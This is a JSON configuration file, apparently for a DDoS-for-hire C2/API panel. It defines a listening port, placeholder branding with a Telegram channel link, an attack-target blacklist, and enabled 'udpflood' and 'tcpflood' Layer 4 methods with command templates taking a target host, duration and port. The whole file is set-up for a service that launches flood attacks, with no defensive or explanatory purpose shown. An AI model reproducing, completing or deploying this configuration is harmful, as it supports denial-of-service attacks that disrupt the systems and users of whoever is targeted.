{
    "connection":{
        "host":"0.0.0.0",
        "port":"1337"
    },

    "html":{
        "enabled":"True",
        "brand":"c2/api name here",
        "brand-link":"t.me/yourchannelname"
    },

    "attacks":{
        "enabled":"True",
        "global_cons":"5",
        "blacklisted":{
            "hosts":[
                "1.1.1.1",
                ".gov"
            ],
            "ports":[
                "19",
                "20"
            ]
        },
        "raw":{
            "host":"",
            "port":"",
            "username":"",
            "password":"",
            "methods":{
                "udpflood":{
                    "enabled":"True",
                    "type":"L4",
                    "usage":".udpflood {HOST} {TIME} port={PORT}"
                },
                "tcpflood":{
                    "enabled":"True",
                    "type":"L4",
                    "usage":".tcpflood {HOST} {TIME} port={PORT}"
                }
            }
        },
        "methods":{
            "wow":{
                "enabled":"True",
                "type":"L4",
                "apis":[
                ]
            }
        }
    }
}